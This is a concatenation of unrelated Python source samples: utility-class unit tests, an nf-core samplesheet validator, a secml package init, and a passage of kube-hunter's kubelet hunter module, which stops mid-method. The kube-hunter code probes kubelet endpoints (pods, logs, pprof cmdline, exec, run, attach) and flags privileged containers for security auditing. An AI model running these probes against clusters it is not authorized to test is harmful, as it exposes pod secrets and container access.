        assert not Ut.has_valid_value(test=True, value=-1, mini=1)
        assert not Ut.has_valid_value(test=True, value=2, maxi=1)
        assert not Ut.has_valid_value(test=True, value=2, eq=1)
        assert not Ut.has_valid_value(test=True, value=0, positive=True)
        assert not Ut.has_valid_value(test=True, value=-1, positive=True)
        assert not Ut.has_valid_value(test=True, value=0, negative=True)
        assert not Ut.has_valid_value(test=True, value=2, negative=True)
        assert not Ut.has_valid_value(test=False, value=1)
        # conflicting eq/mini/maxi/not_null combinations raise AttributeError
        with pytest.raises(AttributeError):
            Ut.has_valid_value(test=True, value=3, eq=3, mini=-1, maxi=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_value(test=False, value=3, eq=3, maxi=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_value(test=False, value=3, eq=3, mini=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_value(test=False, value=3, eq=-3, not_null=True)
        with pytest.raises(AttributeError):
            Ut.has_valid_value(test=False, value=3, mini=5, maxi=2)
        with pytest.raises(TypeError):
            Ut.has_valid_value(test=True, value='tst', mini=-1)
        with pytest.raises(TypeError):
            assert Ut.has_valid_value(test=True, value=None, maxi=2)

    def test_is_str(self):
        """Test is_str method"""
        datas = [
            '_hy', 'hy', "#hj_58 Hyufdgdfi#", "hj_58Hyui", "",  # true
            -1, True, dict(), list(), None  # false
        ]
        tests = [x for x in datas if Ut.is_str(value=x, mini=3, maxi=10)]
        assert len(tests) == 2
        tests = [x for x in datas if Ut.is_str(value=x, not_null=True, maxi=10)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_str(value=x, not_null=True)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_valid_format(value=x, data_type='str', not_null=True)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_valid_format(value=x, data_type=str)]
        assert len(tests) == 5

    def test_is_bool(self):
        """Test is_bool method"""
        datas = [
            True, False,  # true
            0, 1, "hello", dict(), list()  # false
        ]
        tests = [x for x in datas if Ut.is_bool(x)]
        assert len(tests) == 2
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='bool')]
        assert len(tests) == 2
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=bool)]
        assert len(tests) == 2

    def test_is_int(self):
        """Test is_int method"""
        # Note: bools are ints in Python, so True/False count as int values.
        datas = [
            0, 0x235, -999999999999999999999999999999999999999999999999999999, 5,
            -2, -6, True, False,  # true
            '_hello', dict(), list(), 0.1  # false
        ]
        tests = [x for x in datas if Ut.is_int(value=x, not_null=True, mini=-3, maxi=10)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_int(value=x, mini=-3, maxi=10)]
        assert len(tests) == 5
        tests = [x for x in datas if Ut.is_int(value=x, maxi=10)]
        assert len(tests) == 7
        tests = [x for x in datas if Ut.is_int(value=x, mini=-6)]
        assert len(tests) == 7
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=int, mini=-3, maxi=10)]
        assert len(tests) == 5
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='int')]
        assert len(tests) == 8

    def test_is_float(self):
        """Test is_float method"""
        datas = [
            0.0, -100.1, -999999999999999999999999999999999999999999999999999999.2,  # true
            5.1, -2.6, -6.5,
            '_hello', True, dict(), list(), 0  # false
        ]
        tests = [x for x in datas if Ut.is_float(value=x, not_null=True, mini=-100.1, maxi=10)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_float(value=x, mini=-6.5, maxi=5.1)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_float(value=x, maxi=5)]
        assert len(tests) == 5
        tests = [x for x in datas if Ut.is_float(value=x, mini=-6.5)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=float, mini=-6.5)]
        assert len(tests) == 4
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='float')]
        assert len(tests) == 6

    def test_is_numeric(self):
        """Test is_numeric method"""
        datas = [
            0, 0x235, -999999999999999999999999999999999999999999999999999999, 5,  # true
            -2, -6, True, False,  # true
            0.0, -100.1, -999999999999999999999999999999999999999999999999999999.2,  # true
            5.1, -2.6, -6.5,
            '_hello', dict(), list()  # false
        ]
        tests = [x for x in datas if Ut.is_numeric(value=x, not_null=True, mini=-100.1, maxi=10)]
        assert len(tests) == 8
        tests = [x for x in datas if Ut.is_numeric(value=x, mini=-6.5, maxi=5.1)]
        assert len(tests) == 10
        tests = [x for x in datas if Ut.is_numeric(value=x, not_null=True, mini=-3, maxi=10)]
        assert len(tests) == 5
        tests = [x for x in datas if Ut.is_numeric(value=x, mini=-3, maxi=10)]
        assert len(tests) == 8
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='numeric', mini=-3, maxi=10)]
        assert len(tests) == 8
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='numeric')]
        assert len(tests) == 14

    def test_is_dict(self):
        """Test is_dict method"""
        datas = [
            dict(), {0: "0", 1: "1", 2: "2", 3: "3"}, {"a": "0", "b": "0"}, {(1, 0): "0"},  # true
            0.0, 1.1, "hello", tuple(), list()  # false
        ]
        tests = [x for x in datas if Ut.is_dict(x, not_null=True, min_items=1)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_dict(x, not_null=True, min_items=2)]
        assert len(tests) == 2
        tests = [x for x in datas if Ut.is_dict(x, min_items=1, max_items=2)]
        assert len(tests) == 2
        with pytest.raises(AttributeError):
            Ut.is_dict({}, min_items=-1, max_items=2)
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=dict, not_null=True)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='dict')]
        assert len(tests) == 4

    def test_is_tuple(self):
        """Test is_tuple method"""
        datas = [
            tuple(), (0, 1, 2), (0, 1, 2, 3), ('a', 'b'),  # true
            0.0, 1.1, "hello", list(), dict()  # false
        ]
        tests = [x for x in datas if Ut.is_tuple(x, not_null=True, min_items=2)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_tuple(x, min_items=3)]
        assert len(tests) == 2
        tests = [x for x in datas if Ut.is_tuple(x, max_items=3)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=tuple, not_null=True)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='tuple')]
        assert len(tests) == 4

    def test_is_list(self):
        """Test is_list method"""
        datas = [
            list(), [0, 1, 2, 3, 4], [1, "0"], [(1, 0), "0"],  # true
            0.0, 1.1, "hello", tuple(), dict()  # false
        ]
        tests = [x for x in datas if Ut.is_list(x, max_items=3)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_list(x, min_items=3)]
        assert len(tests) == 1
        tests = [x for x in datas if Ut.is_valid_format(x, data_type=list, not_null=True)]
        assert len(tests) == 3
        tests = [x for x in datas if Ut.is_valid_format(x, data_type='list')]
        assert len(tests) == 4

    def test_is_valid_format(self):
        """Test is_valid_format method"""
        with pytest.raises(AttributeError):
            Ut.is_valid_format({}, data_type="bad data type")
        assert Ut.is_list(Ut.get_valid_data_types_test())

    def test_get_int(self):
        """Test get_int method"""
        assert Ut.get_int("hello", 0) == 0
        assert Ut.get_int(0.1) == 0
        assert Ut.get_int("bg", 2) == 2
        assert Ut.get_int(True) == 1
        assert Ut.get_int([]) == 0

    def test_get_float(self):
        """Test get_float method"""
        assert Ut.get_float("hello", 0.0) == 0.0
        assert Ut.get_float(0.1) == 0.1
        assert Ut.get_float("bg", 2.5) == 2.5
        assert Ut.get_float(True) == 1.0
        assert Ut.get_float([]) == 0.0

    def test_get_rounded_float(self):
        """Test get_rounded_float method"""
        assert Ut.get_rounded_float("hello", 1, 0.156) == 0.0
        assert Ut.get_rounded_float(0.1665616, 3) == 0.167
        assert Ut.get_rounded_float("bg", 2, 2.589898) == 0.0
        assert Ut.get_rounded_float(None, dict(), None) is None

    def test_get_str(self):
        """Test get_str method"""
        assert Ut.get_str("hello") == "hello"
        assert Ut.get_str(0.1665616) == "0.1665616"
        assert Ut.get_str(10) == "10"

    def test_format_by_type(self):
        """Test format_by_type method"""
        assert Ut.format_by_type("32", 'int') == 32
        assert Ut.format_by_type("32", 'float') == 32.0
        assert Ut.format_by_type(32, 'str') == '32'
        assert Ut.format_by_type(1, 'bool') is True
        assert Ut.format_by_type(True, 'onOff') == 'On'
        assert Ut.format_by_type(False, 'onOff') == 'Off'
        assert Ut.format_by_type(True, 'intBool') == 1
        assert Ut.format_by_type(False, 'intBool') == 0
        assert Ut.format_by_type(1.25698789, 'float', 3) == 1.257
        assert Ut.format_by_type(8, 'intString') == "08"
        assert Ut.format_by_type(10, 'intString') == "10"
        with pytest.raises(AttributeError):
            Ut.format_by_type({}, data_type="bad data type")

    def test_int_to_formatted_string(self):
        """Test int_to_formatted_string method"""
        assert Ut.int_to_formatted_string(0) == "00"
        assert Ut.int_to_formatted_string(5) == "05"
        assert Ut.int_to_formatted_string(10) == "10"
        assert Ut.int_to_formatted_string(125) == "125"
        assert Ut.int_to_formatted_string("bad") is None
        assert Ut.int_to_formatted_string("bad", False) is False

    def test_str_to_bool(self):
        """Test str_to_bool method"""
        assert Ut.str_to_bool("true")
        assert Ut.str_to_bool("1")
        assert Ut.str_to_bool("On")
        assert Ut.str_to_bool("Ok")
        assert Ut.str_to_bool(1)
        assert Ut.str_to_bool(True)
        assert not Ut.str_to_bool("False")
        assert not Ut.str_to_bool("0")
        assert not Ut.str_to_bool("Off")
        assert not Ut.str_to_bool("Error")
        assert not Ut.str_to_bool(0)
        assert not Ut.str_to_bool(False)
        assert Ut.str_to_bool(None, None) is None

    def test_bool_to_int_text(self):
        """Test bool_to_int_text method"""
        assert Ut.bool_to_int_text(True) == "1"
        assert Ut.bool_to_int_text(False) == "0"

    def test_bool_to_on_off(self):
        """Test bool_to_on_off method"""
        assert Ut.bool_to_on_off(True) == "On"
        assert Ut.bool_to_on_off(False) == "Off"

    def test_bool_to_str_state(self):
        """Test bool_to_str_state method"""
        assert Ut.bool_to_str_state(True) == "Ok"
        assert Ut.bool_to_str_state(False) == "Error"

    def test_string_to_int_bool(self):
        """Test string_to_int_bool method"""
        assert Ut.string_to_int_bool(True) == 1
        assert Ut.string_to_int_bool(False) == 0

    def test_string_to_float(self):
        """Test string_to_float method"""
        # accepts both ',' and '.' as the decimal separator
        assert Ut.string_to_float('0,125') == 0.125
        assert Ut.string_to_float('0.125') == 0.125
        assert Ut.string_to_float(0.125) == 0.125
        assert Ut.string_to_float(None, None) is None

    def test_init_dict(self):
        """Test init_dict method"""
        assert Ut.init_dict('0,125') == dict()
        assert Ut.init_dict({'a': 0}) == {'a': 0}

    def test_init_dict_key(self):
        """Test init_dict_key method"""
        assert Ut.init_dict_key(dict(), 'my_key', list()) == {'my_key': list()}
        assert Ut.init_dict_key(dict(), 'my_key', dict()) == {'my_key': dict()}
        with pytest.raises(ValueError):
            assert Ut.init_dict_key(dict(), None, dict())

    def test_get_items_from_dict(self):
        """Test get_items_from_dict method"""
        data = {
            'a': 0, 'b': 1, 'c': 2
        }
        assert Ut.get_items_from_dict(data, ['a']) == {'a': 0}
        assert Ut.get_items_from_dict(data, ['a', 'c']) == {'a': 0, 'c': 2}
| StarcoderdataPython |
6531453 | <filename>bin/check_samplesheet.py
#!/usr/bin/env python
# This script is based on the example at: https://raw.githubusercontent.com/nf-core/test-datasets/viralrecon/samplesheet/samplesheet_test_illumina_amplicon.csv
import os
import sys
import errno
import argparse
def parse_args(args=None):
    """Build the CLI parser and parse *args* (defaults to sys.argv)."""
    parser = argparse.ArgumentParser(
        description="Reformat nf-core/mhcquant samplesheet file and check its contents.",
        epilog="Example usage: python check_samplesheet.py <FILE_IN> <FILE_OUT>",
    )
    # Two mandatory positional arguments: input samplesheet, output file.
    for arg_name, arg_help in (("FILE_IN", "Input samplesheet file."), ("FILE_OUT", "Output file.")):
        parser.add_argument(arg_name, help=arg_help)
    return parser.parse_args(args)
def make_dir(path):
    """Create *path* (including parents) if it does not already exist.

    An empty path is a no-op (happens when the output file has no
    directory component). Uses ``exist_ok=True`` instead of manually
    swallowing ``EEXIST``; note this is slightly stricter than the old
    code, which also ignored EEXIST when *path* existed as a file.
    """
    if len(path) > 0:
        os.makedirs(path, exist_ok=True)
def print_error(error, context="Line", context_str=""):
    """Print a samplesheet validation error and abort with exit status 1.

    When both *context* and *context_str* are non-empty, the offending
    line is echoed underneath the message.
    """
    if context != "" and context_str != "":
        message = "ERROR: Please check samplesheet -> {}\n{}: '{}'".format(
            error, context.strip(), context_str.strip()
        )
    else:
        message = "ERROR: Please check samplesheet -> {}".format(error)
    print(message)
    sys.exit(1)
def check_samplesheet(file_in, file_out):
    """
    Validate a tab-separated MHCquant samplesheet and write a reformatted copy.

    Expected input structure:

    ID\tSample\tCondition\tReplicateFileName
    1\tWT\tA\tWT_A.raw
    2\tWT\tB\tWT_B.raw
    3\tKO\tA\tKO_A.raw
    4\tKO\tB\tKO_B.raw

    :param file_in: path to the input samplesheet (TSV)
    :param file_out: path the validated sheet is written to
    """
    sample_run_dict = {}
    with open(file_in, "r") as fin:
        ## Check header
        MIN_COLS = 4
        HEADER = ["ID", "Sample", "Condition", "ReplicateFileName"]
        header = [x.strip('"') for x in fin.readline().strip().split("\t")]
        if header[: len(HEADER)] != HEADER:
            print("ERROR: Please check samplesheet header -> {} != {}".format("\t".join(header), "\t".join(HEADER)))
            sys.exit(1)

        ## Check sample entries
        for line in fin:
            lspl = [x.strip().strip('"') for x in line.strip().split("\t")]

            ## Check valid number of columns per row
            if len(lspl) < len(HEADER):
                print_error(
                    "Invalid number of columns (minimum = {})!".format(len(HEADER)),
                    "Line",
                    line,
                )
            num_cols = len([x for x in lspl if x])
            if num_cols < MIN_COLS:
                print_error(
                    "Invalid number of populated columns (minimum = {})!".format(MIN_COLS),
                    "Line",
                    line,
                )

            ident, sample, condition, filename = lspl[: len(HEADER)]

            ## The ID column must be an integer; it is kept as a string key.
            ## BUG FIX: the original converted to int only when isdigit() was
            ## False, raising an unhandled ValueError instead of reporting.
            if not ident.isdigit():
                print_error("ID entry is not an integer!", "Line", line)
            identifier = ident

            ## Sample and Condition must be present and free of spaces.
            for group in [sample, condition]:
                if group:
                    if group.find(" ") != -1:
                        print_error("Group entry contains spaces!", "Line", line)
                else:
                    print_error("Group entry has not been specified!", "Line", line)

            ## Check the MS file extension (.mzML is matched case-insensitively,
            ## consistent with the branch that records the file type).
            ## BUG FIX: the error messages previously said "FastQ file",
            ## copied from the viralrecon template this script is based on.
            if filename:
                if filename.find(" ") != -1:
                    print_error("MS file contains spaces!", "Line", line)
                if filename.endswith(".raw"):
                    sample_info = [sample, condition, filename, "raw"]
                elif filename.lower().endswith(".mzml"):
                    sample_info = [sample, condition, filename, "mzml"]
                else:
                    print_error(
                        "MS file does not have extension '.raw' or '.mzML'!",
                        "Line",
                        line,
                    )
            else:
                ## Guards against `sample_info` being unbound below.
                print_error("MS file has not been specified!", "Line", line)

            ## Create mapping: {identifier: [[sample, condition, filename, ext]]}
            ## BUG FIX: the original tested `sample` for membership although the
            ## dict is keyed by the identifier, causing a KeyError when a sample
            ## name repeats under a new ID.
            if identifier not in sample_run_dict:
                sample_run_dict[identifier] = [sample_info]
            else:
                if sample_info in sample_run_dict[identifier]:
                    print_error("Samplesheet contains duplicate rows!", "Line", line)
                else:
                    sample_run_dict[identifier].append(sample_info)

    ## Write validated samplesheet with appropriate columns
    if len(sample_run_dict) > 0:
        out_dir = os.path.dirname(file_out)
        make_dir(out_dir)
        with open(file_out, "w") as fout:
            fout.write("\t".join(["ID", "Sample", "Condition", "Filename", "FileExt"]) + "\n")
            for identifier in sorted(sample_run_dict.keys()):
                for sample_info in sample_run_dict[identifier]:
                    fout.write("\t".join([identifier] + sample_info) + "\n")
def main(args=None):
    """Script entry point: parse CLI arguments, then validate the samplesheet."""
    opts = parse_args(args)
    check_samplesheet(opts.FILE_IN, opts.FILE_OUT)
if __name__ == "__main__":
    sys.exit(main())
| StarcoderdataPython |
4822569 | <reponame>zangobot/secml<filename>src/secml/parallel/__init__.py
from .parfor import parfor, parfor2
| StarcoderdataPython |
78272 | <reponame>PhilippGoecke/kube-hunter
import json
import logging
import time
from enum import Enum
import re
import requests
import urllib3
import uuid
from kube_hunter.conf import get_config
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import (
Hunter,
ActiveHunter,
KubernetesCluster,
Kubelet,
ExposedSensitiveInterfacesTechnique,
ExecIntoContainerTechnique,
GeneralDefenseEvasionTechnique,
GeneralSensitiveInformationTechnique,
PrivilegedContainerTechnique,
AccessKubeletAPITechnique,
)
from kube_hunter.modules.discovery.kubelet import (
ReadOnlyKubeletEvent,
SecureKubeletEvent,
)
logger = logging.getLogger(__name__)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ExposedPodsHandler(Vulnerability, Event):
    """An attacker could view sensitive information about pods that are
    bound to a Node using the /pods endpoint"""
    # NOTE(review): the class docstring appears to double as the report text for
    # this finding (KHV052), so it is intentionally left untouched.
    def __init__(self, pods):
        Vulnerability.__init__(
            self, component=Kubelet, name="Exposed Pods", category=AccessKubeletAPITechnique, vid="KHV052"
        )
        # Raw pod dicts taken from the kubelet /pods response "items" list.
        self.pods = pods
        self.evidence = f"count: {len(self.pods)}"
class AnonymousAuthEnabled(Vulnerability, Event):
    """The kubelet is misconfigured, potentially allowing secure access to all requests on the kubelet,
    without the need to authenticate"""
    # Published by SecureKubeletPortHunter when the event reports anonymous auth.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Anonymous Authentication",
            category=ExposedSensitiveInterfacesTechnique,
            vid="KHV036",
        )
class ExposedContainerLogsHandler(Vulnerability, Event):
    """Output logs from a running container are using the exposed /containerLogs endpoint"""
    # No evidence attached here; ProveContainerLogsHandler fills event.evidence later.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Container Logs",
            category=AccessKubeletAPITechnique,
            vid="KHV037",
        )
class ExposedRunningPodsHandler(Vulnerability, Event):
    """Outputs a list of currently running pods,
    and some of their metadata, which can reveal sensitive information"""
    def __init__(self, count):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Running Pods",
            category=AccessKubeletAPITechnique,
            vid="KHV038",
        )
        # Number of pods returned by the kubelet /runningpods endpoint.
        self.count = count
        self.evidence = f"{self.count} running pods"
class ExposedExecHandler(Vulnerability, Event):
    """An attacker could run arbitrary commands on a container"""
    # Corresponds to the kubelet /exec handler being reachable.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Exec On Container",
            category=ExecIntoContainerTechnique,
            vid="KHV039",
        )
class ExposedRunHandler(Vulnerability, Event):
    """An attacker could run an arbitrary command inside a container"""
    # Corresponds to the kubelet /run handler; triggers ProveRunHandler.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Run Inside Container",
            category=ExecIntoContainerTechnique,
            vid="KHV040",
        )
class ExposedPortForwardHandler(Vulnerability, Event):
    """An attacker could set port forwarding rule on a pod"""
    # Never published in practice: test_port_forward() below is not implemented.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Port Forward",
            category=GeneralDefenseEvasionTechnique,
            vid="KHV041",
        )
class ExposedAttachHandler(Vulnerability, Event):
    """Opens a websocket that could enable an attacker
    to attach to a running container"""
    # Corresponds to the kubelet /attach handler being reachable.
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Attaching To Container",
            category=ExecIntoContainerTechnique,
            vid="KHV042",
        )
class ExposedHealthzHandler(Vulnerability, Event):
    """By accessing the open /healthz handler,
    an attacker could get the cluster health state without authenticating"""
    def __init__(self, status):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Cluster Health Disclosure",
            category=GeneralSensitiveInformationTechnique,
            vid="KHV043",
        )
        # Body text returned by /healthz (e.g. "ok").
        self.status = status
        self.evidence = f"status: {self.status}"
class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event):
    """A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \
    can leverage the existing privileged containers identified to damage the host and potentially \
    the whole cluster"""
    def __init__(self, exposed_existing_privileged_containers):
        Vulnerability.__init__(
            self,
            component=KubernetesCluster,
            name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port",
            category=PrivilegedContainerTechnique,
            vid="KHV051",
        )
        # List of dicts (pod_namespace, pod_id, container_name, service_account_token,
        # environment_variables) built by ProveAnonymousAuth.execute().
        self.exposed_existing_privileged_containers = exposed_existing_privileged_containers
class PrivilegedContainers(Vulnerability, Event):
    """A Privileged container exist on a node
    could expose the node/cluster to unwanted root operations"""
    def __init__(self, containers):
        Vulnerability.__init__(
            self,
            component=KubernetesCluster,
            name="Privileged Container",
            category=PrivilegedContainerTechnique,
            vid="KHV044",
        )
        # containers: non-empty list of (pod_name, container_name) tuples;
        # evidence shows only the first one plus the total count.
        self.containers = containers
        self.evidence = f"pod: {containers[0][0]}, " f"container: {containers[0][1]}, " f"count: {len(containers)}"
class ExposedSystemLogs(Vulnerability, Event):
    """System logs are exposed from the /logs endpoint on the kubelet"""
    # Published when test_logs_endpoint() finds a directory listing ("<pre>").
    def __init__(self):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed System Logs",
            category=AccessKubeletAPITechnique,
            vid="KHV045",
        )
class ExposedKubeletCmdline(Vulnerability, Event):
    """Commandline flags that were passed to the kubelet can be obtained from the pprof endpoints"""
    def __init__(self, cmdline):
        Vulnerability.__init__(
            self,
            component=Kubelet,
            name="Exposed Kubelet Cmdline",
            category=AccessKubeletAPITechnique,
            vid="KHV046",
        )
        # Raw text returned by /debug/pprof/cmdline.
        self.cmdline = cmdline
        self.evidence = f"cmdline: {self.cmdline}"
class KubeletHandlers(Enum):
    """URL path templates (relative to the kubelet base URL) for kubelet API handlers.

    Templates contain str.format placeholders such as {pod_namespace}, {pod_id},
    {container_name}, {cmd}, {port}, {path}; callers fill them via .value.format(...).
    """
    # GET
    PODS = "pods"
    # GET
    CONTAINERLOGS = "containerLogs/{pod_namespace}/{pod_id}/{container_name}"
    # GET
    RUNNINGPODS = "runningpods"
    # GET -> WebSocket
    EXEC = "exec/{pod_namespace}/{pod_id}/{container_name}?command={cmd}&input=1&output=1&tty=1"
    # POST, For legacy reasons, it uses different query param than exec
    RUN = "run/{pod_namespace}/{pod_id}/{container_name}?cmd={cmd}"
    # GET/POST
    PORTFORWARD = "portForward/{pod_namespace}/{pod_id}?port={port}"
    # GET -> WebSocket
    ATTACH = "attach/{pod_namespace}/{pod_id}/{container_name}?command={cmd}&input=1&output=1&tty=1"
    # GET
    LOGS = "logs/{path}"
    # GET
    PPROF_CMDLINE = "debug/pprof/cmdline"
@handler.subscribe(ReadOnlyKubeletEvent)
class ReadOnlyKubeletPortHunter(Hunter):
    """Kubelet Readonly Ports Hunter
    Hunts specific endpoints on open ports in the readonly Kubelet server
    """
    def __init__(self, event):
        self.event = event
        # Read-only port is plain HTTP; no session/auth needed.
        self.path = f"http://{self.event.host}:{self.event.port}"
        self.pods_endpoint_data = ""
    def get_k8s_version(self):
        """Parse the kubernetes_build_info metric for gitVersion; None if absent."""
        config = get_config()
        logger.debug("Passive hunter is attempting to find kubernetes version")
        metrics = requests.get(f"{self.path}/metrics", timeout=config.network_timeout).text
        for line in metrics.split("\n"):
            if line.startswith("kubernetes_build_info"):
                # Split the label set inside {...} into key="value" pairs.
                for info in line[line.find("{") + 1 : line.find("}")].split(","):
                    k, v = info.split("=")
                    if k == "gitVersion":
                        return v.strip('"')
    # returns list of tuples of Privileged container and their pod.
    def find_privileged_containers(self):
        logger.debug("Trying to find privileged containers and their pods")
        privileged_containers = []
        if self.pods_endpoint_data:
            for pod in self.pods_endpoint_data["items"]:
                for container in pod["spec"]["containers"]:
                    if container.get("securityContext", {}).get("privileged"):
                        privileged_containers.append((pod["metadata"]["name"], container["name"]))
        # None (not []) when nothing found, so callers can truth-test the result.
        return privileged_containers if len(privileged_containers) > 0 else None
    def get_pods_endpoint(self):
        """Return the parsed /pods JSON, or None when the response lacks "items"."""
        config = get_config()
        logger.debug("Attempting to find pods endpoints")
        response = requests.get(f"{self.path}/pods", timeout=config.network_timeout)
        if "items" in response.text:
            return response.json()
    def check_healthz_endpoint(self):
        """Return the /healthz body on HTTP 200, else False."""
        config = get_config()
        r = requests.get(f"{self.path}/healthz", verify=False, timeout=config.network_timeout)
        return r.text if r.status_code == 200 else False
    def execute(self):
        # Probe first, then publish one event per positive finding.
        self.pods_endpoint_data = self.get_pods_endpoint()
        k8s_version = self.get_k8s_version()
        privileged_containers = self.find_privileged_containers()
        healthz = self.check_healthz_endpoint()
        if k8s_version:
            self.publish_event(
                K8sVersionDisclosure(version=k8s_version, from_endpoint="/metrics", extra_info="on Kubelet")
            )
        if privileged_containers:
            self.publish_event(PrivilegedContainers(containers=privileged_containers))
        if healthz:
            self.publish_event(ExposedHealthzHandler(status=healthz))
        if self.pods_endpoint_data:
            self.publish_event(ExposedPodsHandler(pods=self.pods_endpoint_data["items"]))
@handler.subscribe(SecureKubeletEvent)
class SecureKubeletPortHunter(Hunter):
    """Kubelet Secure Ports Hunter
    Hunts specific endpoints on an open secured Kubelet
    """
    class DebugHandlers:
        """all methods will return the handler name if successful"""
        def __init__(self, path, pod, session=None):
            # Normalize path so handler templates can be appended directly.
            self.path = path + ("/" if not path.endswith("/") else "")
            self.session = session if session else requests.Session()
            # pod: dict with "name", "namespace", "container" used to fill templates.
            self.pod = pod
        # outputs logs from a specific container
        def test_container_logs(self):
            config = get_config()
            logs_url = self.path + KubeletHandlers.CONTAINERLOGS.value.format(
                pod_namespace=self.pod["namespace"],
                pod_id=self.pod["name"],
                container_name=self.pod["container"],
            )
            return self.session.get(logs_url, verify=False, timeout=config.network_timeout).status_code == 200
        # need further investigation on websockets protocol for further implementation
        def test_exec_container(self):
            config = get_config()
            # opens a stream to connect to using a web socket
            headers = {"X-Stream-Protocol-Version": "v2.channel.k8s.io"}
            exec_url = self.path + KubeletHandlers.EXEC.value.format(
                pod_namespace=self.pod["namespace"],
                pod_id=self.pod["name"],
                container_name=self.pod["container"],
                cmd="",
            )
            # A redirect body containing /cri/exec/ indicates the handler is live.
            return (
                "/cri/exec/"
                in self.session.get(
                    exec_url,
                    headers=headers,
                    allow_redirects=False,
                    verify=False,
                    timeout=config.network_timeout,
                ).text
            )
        # need further investigation on websockets protocol for further implementation
        def test_port_forward(self):
            # Not implemented: always returns None, so the caller's truth test never fires.
            pass
            # TODO: what to return?
            # Example starting code:
            #
            # config = get_config()
            # headers = {
            #     "Upgrade": "websocket",
            #     "Connection": "Upgrade",
            #     "Sec-Websocket-Key": "s",
            #     "Sec-Websocket-Version": "13",
            #     "Sec-Websocket-Protocol": "SPDY",
            # }
            # pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
            #     pod_namespace=self.pod["namespace"],
            #     pod_id=self.pod["name"],
            #     port=80,
            # )
        # executes one command and returns output
        def test_run_container(self):
            config = get_config()
            # Deliberately targets a nonexistent pod/container ("test").
            run_url = self.path + KubeletHandlers.RUN.value.format(
                pod_namespace="test",
                pod_id="test",
                container_name="test",
                cmd="",
            )
            # if we get this message, we know we passed Authentication and Authorization, and that the endpoint is enabled.
            status_code = self.session.post(run_url, verify=False, timeout=config.network_timeout).status_code
            return status_code == requests.codes.NOT_FOUND
        # returns list of currently running pods
        def test_running_pods(self):
            config = get_config()
            pods_url = self.path + KubeletHandlers.RUNNINGPODS.value
            r = self.session.get(pods_url, verify=False, timeout=config.network_timeout)
            return r.json() if r.status_code == 200 else False
        # need further investigation on the differences between attach and exec
        def test_attach_container(self):
            config = get_config()
            # headers={"X-Stream-Protocol-Version": "v2.channel.k8s.io"}
            attach_url = self.path + KubeletHandlers.ATTACH.value.format(
                pod_namespace=self.pod["namespace"],
                pod_id=self.pod["name"],
                container_name=self.pod["container"],
                cmd="",
            )
            return (
                "/cri/attach/"
                in self.session.get(
                    attach_url,
                    allow_redirects=False,
                    verify=False,
                    timeout=config.network_timeout,
                ).text
            )
        # checks access to logs endpoint
        def test_logs_endpoint(self):
            config = get_config()
            # NOTE(review): unlike the other probes this call omits verify=False;
            # on a self-signed kubelet cert it would raise (caught upstream in
            # test_handlers). Confirm whether that is intentional.
            logs_url = self.session.get(
                self.path + KubeletHandlers.LOGS.value.format(path=""),
                timeout=config.network_timeout,
            ).text
            # A "<pre>" tag indicates the directory-listing page was served.
            return "<pre>" in logs_url
        # returns the cmd line used to run the kubelet
        def test_pprof_cmdline(self):
            config = get_config()
            cmd = self.session.get(
                self.path + KubeletHandlers.PPROF_CMDLINE.value,
                verify=False,
                timeout=config.network_timeout,
            )
            return cmd.text if cmd.status_code == 200 else None
    def __init__(self, event):
        self.event = event
        self.session = requests.Session()
        if self.event.secure:
            self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
            # self.session.cert = self.event.client_cert
        # copy session to event
        self.event.session = self.session
        self.path = f"https://{self.event.host}:10250"
        # Pod identity used when kube-hunter itself runs inside the cluster.
        self.kubehunter_pod = {
            "name": "kube-hunter",
            "namespace": "default",
            "container": "kube-hunter",
        }
        self.pods_endpoint_data = ""
    def get_pods_endpoint(self):
        """Return the parsed /pods JSON (authenticated session), or None."""
        config = get_config()
        response = self.session.get(f"{self.path}/pods", verify=False, timeout=config.network_timeout)
        if "items" in response.text:
            return response.json()
    def check_healthz_endpoint(self):
        """Return the /healthz body on HTTP 200, else False."""
        config = get_config()
        r = requests.get(f"{self.path}/healthz", verify=False, timeout=config.network_timeout)
